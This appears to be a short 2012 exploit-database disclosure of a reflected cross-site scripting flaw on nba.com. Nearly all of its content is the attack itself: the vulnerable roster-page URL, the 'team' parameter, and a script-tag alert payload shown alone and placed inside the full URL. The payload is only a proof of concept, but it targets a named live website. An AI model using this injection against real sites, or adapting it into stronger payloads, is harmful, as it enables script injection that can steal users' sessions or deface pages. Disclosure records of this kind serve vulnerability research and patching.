NBA.com suffers from a cross site scripting vulnerability.
b09b802e722c67ea7148e08e62631b6ae8e2dfe4744978f4154d85b848ea4d08
# Exploit Title: nba.com xss
# Date: 22.08.2012
# Author: TayfunBasoglu
# Tested: BackTrack 5
# Platform: Php
------------------------------------------------------------------
http://www.nba.com/games/gameInfo/teamRoster.html?team=XSS
<script>alert("TayfunBasoglu")</script>
http://www.nba.com/games/gameInfo/teamRoster.html?team=<script>alert("TayfunBasoglu")</script>
------------------------------------------------------------------
tayfunbasoglu.blogspot.com